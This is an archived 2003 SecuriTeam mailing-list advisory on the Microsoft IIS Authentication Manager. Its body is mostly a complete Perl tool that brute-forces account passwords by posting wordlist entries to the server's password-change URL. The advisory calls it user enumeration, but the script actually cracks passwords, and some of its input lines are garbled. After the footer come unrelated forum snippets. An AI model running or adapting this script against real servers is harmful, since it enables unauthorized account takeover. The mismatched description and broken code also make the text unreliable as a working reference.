[TOOL] Microsoft IIS Authentication Manager Account Confirmation Vulnerability

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 5 May 2003 17:33:37 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Microsoft IIS Authentication Manager Account Confirmation Vulnerability
------------------------------------------------------------------------

DETAILS

The following tool will use the aexp4b.htr script to enumerate the names
of the users currently present on a remote server.

Tool:
####################################################################
# Miscrosoft IIS Authentication Manager BruteForce Tool - By JeiAr
http://www.gulftech.org
####################################################################
# This tool can be used to brute force user accounts via dictionary attack
on the Microsoft
# IIS Authentication Manager.
####################################################################

use LWP::UserAgent;

##################################################################### Time
to create the new LWP User Agent, Clear the screen, And print out the
scripts header
####################################################################

$ua = new LWP::UserAgent;
$ua->agent("AgentName/0.1 " . $ua->agent);
system('cls');
&header;

####################################################################
# Gather all user inputted data. Such as the domain name, host and
location of the wordlist
####################################################################
print "Host: ";
$host=;
chomp $host;
print "Domain: ";
$domain=;
chomp $domain;
print "Account: ";
$account=;
chomp $account;
print "Word List: ";
$list=;
chomp $list;

#####################################################################
Opens the wordlist and puts the data into an array. afterward setting the
count variables
####################################################################

open (DATAFILE, "$list");
@datafile = ;
chomp(@datafile);
$length = @datafile;
$count = 0;
$found = 0;

&space;
print "Cracked Accounts\n";
print "----------------\n";

####################################################################
# Creates the HTTP request, Checks the responses, then prints out the
username if it exists
####################################################################

while ($count < $length) {
$password = (@datafile[$count]);
my $req = new HTTP::Request POST => "http://$host/_AuthChangeUrl?";
 $req->content_type('application/x-www-form-urlencoded');
 $req->content
("domain=$domain&acct=$account&old=$password&new=$password&new2=$password"
);
my $res = $ua->request($req);
$pattern = "Password successfully changed";
$_ = $res->content;
if (/$pattern/) {
print "$account : $password\n";
last if (/$pattern/);
 }
 $count++;
}

#####################################################################
Thats all folks. Prints out the final details and footer. Rest is just the
subroutines :)
####################################################################

&space;
&footer;

sub header {
print "IIS Auth Manager Brute Forcing Tool By JeiAr
[http://www.gulftech.org] \n";
print "-------------------------------------------------------------------
--- \n";
}

sub footer {
print "Session Results:\n";
print "--------------------\n";
print "Number Of Words : $length \n";
print "Number Of Tries : $count \n";
}

sub space {
print "\n" x2;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:jeiar@kmfms.com> JeiAr.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Microsoft IIS Authentication Manager Account Conformation Vuln? ... SURE you all know about the IIS Authentication Manager Vuln ... basically let you verify whether or not a user account exists. ... chomp $domain; ... sub header { ... (Bugtraq) Problem disabling AD Account ... 'Sub to intialise and load the HTA Script Window. ... 'Sub to search for the AD account and then disable it using input ... UserCn = ltrim)) ... ParentDn = ltrim)) ... (microsoft.public.scripting.vbscript) Problem disabling and deleting AD Account ... 'Sub to intialise and load the HTA Script Window. ... 'Sub to search for the AD account and then disable it using input ... UserCn = ltrim)) ... ParentDn = ltrim)) ... (microsoft.public.windows.server.scripting) Problems creating an exchange mailbox and setting permissions ... Exchange Mailbox the rest is working fine. ... sub Window_Onload ... msgbox "Please enter the users First Name" ... msgbox "Please select the Account Type" ... (microsoft.public.scripting.vbscript) RE: Cant access SOME sites on one particular XP account on TWO PC ... # be placed in the first column followed by the corresponding host name. ... Can I email you a screen shot of all the host*.* files from one of the PCs ... "nass" wrote: ... Remember that ONE account on the PC it works fine on BOTH accounts. ... (microsoft.public.windows.inetexplorer.ie6.browser)